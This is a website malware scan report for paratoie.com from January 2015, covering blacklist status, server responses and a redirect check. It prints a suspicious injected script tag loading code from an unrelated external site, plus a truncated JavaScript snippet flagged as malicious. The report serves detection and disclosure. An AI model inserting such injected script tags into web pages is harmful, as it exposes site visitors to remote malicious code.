Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paratoie.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://paratoie.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:07:08 GMT Location: http://www.paratoie.com/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.paratoie.com/ | HTTP/1.1 200 OK Date: Thu, 08 Jan 2015 09:07:09 GMT Accept-Ranges: bytes ETag: "e8d8d5c4ef3cf1:581144" Server: Microsoft-IIS/6.0 Content-Length: 4416 Content-Location: http://www.paratoie.com/index.htm Content-Type: text/html Last-Modified: Wed, 29 Oct 2014 08:00:10 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.paratoie.com/index.htm | 200 OK Content-Length: 4416 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://linuxdaytorino.org/2011/r3pdqbkt.php?id=1838253"></script> | ||
http://codicepro.shinystat.it/cgi-bin/getcod.cgi?USER=amgimp&P=1 | 200 OK Content-Length: 4175 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function cCk(nm,vl,mn){var ex=cdm="";var _sscdom="";if (_sscdom && _sscdom!="") { cdm=" domain="+_sscdom; if (mn) {document.cookie=nm+"=; expires=Thu, 01-Jan-70 00:00:01 GMT; path=/;";}}if (mn) {var d=new Date();d.setTime(d.getTime()+(mn*6*1000)); ex="; expires="+d.toGMTString();} document.cookie=nm+"="+vl+ex+"; path=/;"+cdm+"";} function rCk(nm){var nEQ=nm+"=";var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i]; while(c.charAt(0)==' ') c=c.subst if (ssqS_.indexOf("NODW=yes")>-1){var ig_=new Image(1,1);ig_.src=ssqS_+"&RM="+Math.round(Math.random()*2147483647);ig_.onload=function(){_ssvoid();}} else{document.write("<a href=\"http://s1.shinystat.com/cgi-bin/shinystatv.cgi?USER="+us_+"&NH=1\" Target=\"_new\"><img src=\""+ssqS_+"\" border=\"0\"/></a>"); } Antivirus reports:
| ||
http://paratoie.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 09:07:09 GMT Location: http://www.paratoie.com/test404page.js Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.paratoie.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: paratoie.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 08 Jan 2015 09:07:08 GMT
Location: http://www.paratoie.com/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: paratoie.com
Referer: http://www.google.com/search?q=paratoie.com
Result:
The result is similar to the first query. There are no suspicious redirects found.